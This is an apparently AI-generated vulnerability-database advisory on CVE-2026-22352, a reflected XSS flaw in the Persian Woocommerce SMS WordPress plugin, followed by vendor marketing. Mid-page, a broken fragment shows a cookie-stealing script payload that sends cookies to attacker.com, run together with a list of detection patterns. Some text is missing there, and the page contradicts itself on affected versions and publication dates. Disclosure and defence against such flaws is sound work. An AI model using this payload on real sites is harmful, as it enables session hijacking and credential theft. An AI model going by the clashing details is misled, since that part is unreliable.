
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-22352 is a Reflected Cross-Site Scripting (XSS) vulnerability in the Persian Woocommerce SMS WordPress plugin by PersianScript. It affects all versions up to and including 7.1.1 (also reported as affecting up to 7.2.0). The vulnerability was reported on November 30, 2025, and published on February 20, 2026, with no official patch available as of the disclosure date. It carries a CVSS v3.1 base score of 7.1 (Medium/High) (Patchstack, Feedly).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), specifically of the reflected type. Insufficient sanitization of user-supplied input allows an attacker to inject malicious scripts into HTTP responses that are then reflected back to the victim's browser. Exploitation requires no authentication (unauthenticated attacker) but does require user interaction — typically tricking a privileged user into clicking a crafted malicious link. The attack vector is network-based with low attack complexity (Patchstack).
Successful exploitation allows an attacker to inject and execute arbitrary JavaScript in the context of a victim's browser session on the affected WordPress site. This can lead to session hijacking, credential theft, unauthorized administrative actions, defacement, or redirection of site visitors to malicious pages. The CVSS scope is marked as "Changed," indicating that the impact can extend beyond the vulnerable component to affect other resources such as the victim's browser environment (Patchstack).
No official patch is available, and Patchstack notes that vulnerabilities of this type are commonly used in mass-exploit campaigns targeting thousands of WordPress sites regardless of traffic size or popularity. The EPSS score is approximately 0.029% (0.000290), indicating a currently low but non-negligible probability of exploitation in the wild. There is no current evidence of active in-the-wild exploitation or threat actor attribution, and the vulnerability is not listed in the CISA KEV catalog (Patchstack, Feedly).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>).<script>, %3Cscript%3E, javascript:) in URL query parameters directed at the Persian Woocommerce SMS plugin endpoints.No official patch from the plugin developer (PersianScript) is available as of the disclosure date. Patchstack has issued a virtual patching/mitigation rule for its subscribers to block exploitation attempts until an official fix is released. Site owners are advised to deactivate and remove the Persian Woocommerce SMS plugin until a patched version is available, or use a web application firewall (WAF) with XSS filtering rules. Hosting providers or web developers should be consulted if immediate action is not feasible (Patchstack).
The vulnerability was discovered and credited to researcher "Bonds" and published by Patchstack on February 11, 2026. Patchstack classifies it as medium priority and notes it is characteristic of vulnerabilities used in mass WordPress exploit campaigns. No significant broader media coverage or notable social media discussion has been identified beyond standard vulnerability database aggregation (Patchstack).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."